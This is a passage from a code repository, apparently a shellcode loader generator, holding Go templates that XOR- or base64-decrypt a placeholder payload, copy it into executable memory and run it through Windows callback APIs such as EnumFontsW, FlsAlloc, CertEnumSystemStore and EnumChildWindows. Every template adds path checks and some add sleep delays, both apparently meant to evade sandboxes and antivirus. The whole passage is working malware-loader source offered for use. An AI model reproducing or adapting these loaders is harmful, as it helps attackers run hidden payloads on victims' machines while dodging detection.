Callback(byteData) 67 | } 68 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/LOCAL/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | 2 | package main 3 | 4 | import( 5 | "golang.org/x/sys/windows" 6 | "time" 7 | "unsafe" 8 | "math/rand" 9 | "os" 10 | "io/ioutil" 11 | 12 | "syscall" 13 | ) 14 | 15 | func XorDecrypt(plaintext []byte, key []byte) []byte { 16 | ciphertext := make([]byte, len(plaintext)) 17 | keyLength := len(key) 18 | for i, byte := range plaintext { 19 | keyByte := key[i % keyLength] 20 | encryptedByte := byte ^ keyByte 21 | ciphertext[i] = encryptedByte 22 | } 23 | return ciphertext 24 | } 25 | 26 | func DecryptData(v2 []byte) []byte { 27 | key := []byte{{{Key}}} 28 | v222 := XorDecrypt(v2, key) 29 | return v222 30 | } 31 | 32 | func WriteMemory(inbuf []byte, destination uintptr) { 33 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 34 | writePtr := unsafe.Pointer(destination + uintptr(index)) 35 | v := (*byte)(writePtr) 36 | *v = inbuf[index] 37 | } 38 | } 39 | 40 | func Ldr1(calc []byte) { 41 | 42 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 43 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 44 | calc_len := uintptr(len(calc)) 45 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 46 | WriteMemory(calc, Ptr1) 47 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 48 | } 49 | 50 | 51 | func Sleeeep() { 52 | res := 1 53 | for i := 0; i < 5; i++ { 54 | number := rand.Intn(900) + 100 55 | res *= number 56 | } 57 | time.Sleep(10 * time.Second) 58 | } 59 | 60 | 61 | 62 | func main() { 63 | 64 | args := os.Args[0] 65 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 66 | os.Exit(0) 67 | } 68 | 69 | Sleeeep() 70 | 71 | content, err := ioutil.ReadFile("{{LOCAL_FILENAME}}") 72 | if err != nil { 73 | return 74 | } 75 | 76 | byteData := DecryptData(content) 77 | 78 | Ldr1(byteData) 79 | 80 | } -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/EMBEDDED/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | if1 [0]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 22 | ntdll = syscall.NewLazyDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 24 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 25 | FlsAlloc = kernel32.NewProc("FlsAlloc") 26 | FlsSetValue = kernel32.NewProc("FlsSetValue") 27 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 28 | ) 29 | 30 | func Callback(shellcode []byte) { 31 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | dIndex, _, _ := FlsAlloc.Call(addr) 34 | dummy, _ := syscall.UTF16PtrFromString("dummy") 35 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 36 | } 37 | 38 | func XorDecrypt(plaintext []byte, key []byte) []byte { 39 | ciphertext := make([]byte, len(plaintext)) 40 | keyLength := len(key) 41 | for i, byte := range plaintext { 42 | keyByte := key[i%keyLength] 43 | encryptedByte := byte ^ keyByte 44 | ciphertext[i] = encryptedByte 45 | } 46 | return ciphertext 47 | } 48 | 49 | func DecryptData(shellcode []byte) []byte { 50 | key := []byte{{{Key}}} 51 | decryptShellcode := XorDecrypt(shellcode, key) 52 | return decryptShellcode 53 | } 54 | 55 | func main() { 56 | args := os.Args[0] 57 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 58 | os.Exit(0) 59 | } 60 | 61 | ciphertext := []byte{{{Shellcode}}} 62 | byteData := DecryptData(ciphertext) 63 | Callback(byteData) 64 | } 65 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/LOCAL/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | dummy [522]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | User32 = syscall.NewLazyDLL("User32.dll") 25 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | GetDC = User32.NewProc("GetDC") 28 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dc, _, _ := GetDC.Call(NULL) 36 | EnumFontsW.Call(dc, NULL, addr, NULL) 37 | } 38 | 39 | func XorDecrypt(plaintext []byte, key []byte) []byte { 40 | ciphertext := make([]byte, len(plaintext)) 41 | keyLength := len(key) 42 | for i, byte := range plaintext { 43 | keyByte := key[i%keyLength] 44 | encryptedByte := byte ^ keyByte 45 | ciphertext[i] = encryptedByte 46 | } 47 | return ciphertext 48 | } 49 | 50 | func DecryptData(shellcode []byte) []byte { 51 | key := []byte{{{Key}}} 52 | decryptShellcode := XorDecrypt(shellcode, key) 53 | return decryptShellcode 54 | } 55 | 56 | func main() { 57 | args := os.Args[0] 58 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 59 | os.Exit(0) 60 | } 61 | 62 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 63 | if err != nil { 64 | return 65 | } 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/EMBEDDED/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "golang.org/x/sys/windows" 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 20 | ntdll = syscall.NewLazyDLL("ntdll.dll") 21 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 22 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 23 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 24 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | if err != nil && err.Error() != "The operation completed successfully." { 30 | syscall.Exit(0) 31 | } 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 34 | 35 | } 36 | 37 | func XorDecrypt(plaintext []byte, key []byte) []byte { 38 | ciphertext := make([]byte, len(plaintext)) 39 | keyLength := len(key) 40 | for i, byte := range plaintext { 41 | keyByte := key[i%keyLength] 42 | encryptedByte := byte ^ keyByte 43 | ciphertext[i] = encryptedByte 44 | } 45 | return ciphertext 46 | } 47 | 48 | func DecryptData(v2 string) []byte { 49 | key := []byte{{{Key}}} 50 | v22, _ := base64.StdEncoding.DecodeString(v2) 51 | v222 := XorDecrypt(v22, key) 52 | return v222 53 | } 54 | 55 | func main() { 56 | args := os.Args[0] 57 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 58 | os.Exit(0) 59 | } 60 | 61 | ciphertext := "{{Shellcode}}" 62 | byteData := DecryptData(ciphertext) 63 | Callback(byteData) 64 | } 65 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/EMBEDDED/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | CAL_SMONTHNAME1 = 0x00000015 18 | ENUM_ALL_CALENDARS = 0xffffffff 19 | SORT_DEFAULT = 0x0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | User32 = syscall.NewLazyDLL("User32.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | EnumChildWindows = User32.NewProc("EnumChildWindows") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." { 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | EnumChildWindows.Call(0, addr, 0) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext := []byte{{{Shellcode}}} 64 | byteData := DecryptData(ciphertext) 65 | Callback(byteData) 66 | } 67 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/EMBEDDED/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | if1 [0]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 25 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 26 | FlsAlloc = kernel32.NewProc("FlsAlloc") 27 | FlsSetValue = kernel32.NewProc("FlsSetValue") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | dIndex, _, _ := FlsAlloc.Call(addr) 35 | dummy, _ := syscall.UTF16PtrFromString("dummy") 36 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 37 | } 38 | 39 | func XorDecrypt(plaintext []byte, key []byte) []byte { 40 | ciphertext := make([]byte, len(plaintext)) 41 | keyLength := len(key) 42 | for i, byte := range plaintext { 43 | keyByte := key[i%keyLength] 44 | encryptedByte := byte ^ keyByte 45 | ciphertext[i] = encryptedByte 46 | } 47 | return ciphertext 48 | } 49 | 50 | func DecryptData(v2 string) []byte { 51 | key := []byte{{{Key}}} 52 | v22, _ := base64.StdEncoding.DecodeString(v2) 53 | v222 := XorDecrypt(v22, key) 54 | return v222 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext := "{{Shellcode}}" 64 | byteData := DecryptData(ciphertext) 65 | Callback(byteData) 66 | } 67 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/LOCAL/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "golang.org/x/sys/windows" 9 | ) 10 | 11 | const ( 12 | MEM_COMMIT = 0x1000 13 | MEM_RESERVE = 0x2000 14 | PAGE_EXECUTE_READWRITE = 0x40 15 | ) 16 | 17 | var ( 18 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 19 | ntdll = syscall.NewLazyDLL("ntdll.dll") 20 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 21 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 22 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 23 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 24 | ) 25 | 26 | func Callback(shellcode []byte) { 27 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 28 | if err != nil && err.Error() != "The operation completed successfully." { 29 | syscall.Exit(0) 30 | } 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 32 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 33 | 34 | } 35 | 36 | func XorDecrypt(plaintext []byte, key []byte) []byte { 37 | ciphertext := make([]byte, len(plaintext)) 38 | keyLength := len(key) 39 | for i, byte := range plaintext { 40 | keyByte := key[i%keyLength] 41 | encryptedByte := byte ^ keyByte 42 | ciphertext[i] = encryptedByte 43 | } 44 | return ciphertext 45 | } 46 | 47 | func DecryptData(shellcode []byte) []byte { 48 | key := []byte{{{Key}}} 49 | decryptShellcode := XorDecrypt(shellcode, key) 50 | return decryptShellcode 51 | } 52 | 53 | func main() { 54 | args := os.Args[0] 55 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 56 | os.Exit(0) 57 | } 58 | 59 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 60 | if err != nil { 61 | return 62 | } 63 | byteData := DecryptData(ciphertext) 64 | Callback(byteData) 65 | } 66 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/LOCAL/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | if1 [0]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 22 | ntdll = syscall.NewLazyDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 24 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 25 | FlsAlloc = kernel32.NewProc("FlsAlloc") 26 | FlsSetValue = kernel32.NewProc("FlsSetValue") 27 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 28 | ) 29 | 30 | func Callback(shellcode []byte) { 31 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | dIndex, _, _ := FlsAlloc.Call(addr) 34 | dummy, _ := syscall.UTF16PtrFromString("dummy") 35 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 36 | } 37 | 38 | func XorDecrypt(plaintext []byte, key []byte) []byte { 39 | ciphertext := make([]byte, len(plaintext)) 40 | keyLength := len(key) 41 | for i, byte := range plaintext { 42 | keyByte := key[i%keyLength] 43 | encryptedByte := byte ^ keyByte 44 | ciphertext[i] = encryptedByte 45 | } 46 | return ciphertext 47 | } 48 | 49 | func DecryptData(shellcode []byte) []byte { 50 | key := []byte{{{Key}}} 51 | decryptShellcode := XorDecrypt(shellcode, key) 52 | return decryptShellcode 53 | } 54 | 55 | func main() { 56 | args := os.Args[0] 57 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 58 | os.Exit(0) 59 | } 60 | 61 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 62 | if err != nil { 63 | return 64 | } 65 | byteData := DecryptData(ciphertext) 66 | Callback(byteData) 67 | } 68 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/EMBEDDED/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | CAL_SMONTHNAME1 = 0x00000015 19 | ENUM_ALL_CALENDARS = 0xffffffff 20 | SORT_DEFAULT = 0x0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | User32 = syscall.NewLazyDLL("User32.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | EnumChildWindows = User32.NewProc("EnumChildWindows") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | EnumChildWindows.Call(0, addr, 0) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext := "{{Shellcode}}" 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/LOCAL/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | dummy [522]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | User32 = syscall.NewLazyDLL("User32.dll") 26 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | GetDC = User32.NewProc("GetDC") 29 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | dc, _, _ := GetDC.Call(NULL) 37 | EnumFontsW.Call(dc, NULL, addr, NULL) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(v2 string) []byte { 52 | key := []byte{{{Key}}} 53 | v22, _ := base64.StdEncoding.DecodeString(v2) 54 | v222 := XorDecrypt(v22, key) 55 | return v222 56 | } 57 | 58 | func main() { 59 | args := os.Args[0] 60 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 61 | os.Exit(0) 62 | } 63 | 64 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 65 | if err != nil { 66 | return 67 | } 68 | byteData := DecryptData(string(ciphertext)) 69 | Callback(byteData) 70 | } 71 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/LOCAL/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | CAL_SMONTHNAME1 = 0x00000015 18 | ENUM_ALL_CALENDARS = 0xffffffff 19 | SORT_DEFAULT = 0x0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | User32 = syscall.NewLazyDLL("User32.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | EnumChildWindows = User32.NewProc("EnumChildWindows") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." { 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | EnumChildWindows.Call(0, addr, 0) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 64 | if err != nil { 65 | return 66 | } 67 | byteData := DecryptData(ciphertext) 68 | Callback(byteData) 69 | } 70 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/LOCAL/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | 2 | package main 3 | 4 | import( 5 | "encoding/base64" 6 | "golang.org/x/sys/windows" 7 | "time" 8 | "unsafe" 9 | "math/rand" 10 | "os" 11 | "io/ioutil" 12 | 13 | "syscall" 14 | ) 15 | 16 | func XorDecrypt(plaintext []byte, key []byte) []byte { 17 | ciphertext := make([]byte, len(plaintext)) 18 | keyLength := len(key) 19 | for i, byte := range plaintext { 20 | keyByte := key[i % keyLength] 21 | encryptedByte := byte ^ keyByte 22 | ciphertext[i] = encryptedByte 23 | } 24 | return ciphertext 25 | } 26 | 27 | func DecryptData(v2 string) []byte { 28 | key := []byte{{{Key}}} 29 | v22, _ := base64.StdEncoding.DecodeString(v2) 30 | v222 := XorDecrypt(v22, key) 31 | return v222 32 | } 33 | 34 | func WriteMemory(inbuf []byte, destination uintptr) { 35 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 36 | writePtr := unsafe.Pointer(destination + uintptr(index)) 37 | v := (*byte)(writePtr) 38 | *v = inbuf[index] 39 | } 40 | } 41 | 42 | func Ldr1(calc []byte) { 43 | 44 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 45 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 46 | calc_len := uintptr(len(calc)) 47 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 48 | WriteMemory(calc, Ptr1) 49 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 50 | } 51 | 52 | 53 | func Sleeeep() { 54 | res := 1 55 | for i := 0; i < 5; i++ { 56 | number := rand.Intn(900) + 100 57 | res *= number 58 | } 59 | time.Sleep(10 * time.Second) 60 | } 61 | 62 | 63 | 64 | func main() { 65 | 66 | args := os.Args[0] 67 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 68 | os.Exit(0) 69 | } 70 | 71 | Sleeeep() 72 | 73 | content, err := ioutil.ReadFile("{{LOCAL_FILENAME}}") 74 | if err != nil { 75 | return 76 | } 77 | 78 | byteData := DecryptData(string(content)) 79 | 80 | Ldr1(byteData) 81 | 82 | } -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/LOCAL/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "golang.org/x/sys/windows" 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 20 | ntdll = syscall.NewLazyDLL("ntdll.dll") 21 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 22 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 23 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 24 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | if err != nil && err.Error() != "The operation completed successfully." { 30 | syscall.Exit(0) 31 | } 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 34 | 35 | } 36 | 37 | func XorDecrypt(plaintext []byte, key []byte) []byte { 38 | ciphertext := make([]byte, len(plaintext)) 39 | keyLength := len(key) 40 | for i, byte := range plaintext { 41 | keyByte := key[i%keyLength] 42 | encryptedByte := byte ^ keyByte 43 | ciphertext[i] = encryptedByte 44 | } 45 | return ciphertext 46 | } 47 | 48 | func DecryptData(v2 string) []byte { 49 | key := []byte{{{Key}}} 50 | v22, _ := base64.StdEncoding.DecodeString(v2) 51 | v222 := XorDecrypt(v22, key) 52 | return v222 53 | } 54 | 55 | func main() { 56 | args := os.Args[0] 57 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 58 | os.Exit(0) 59 | } 60 | 61 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 62 | if err != nil { 63 | return 64 | } 65 | byteData := DecryptData(string(ciphertext)) 66 | Callback(byteData) 67 | } 68 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/EMBEDDED/go_EnumResourceTypesExW.go: 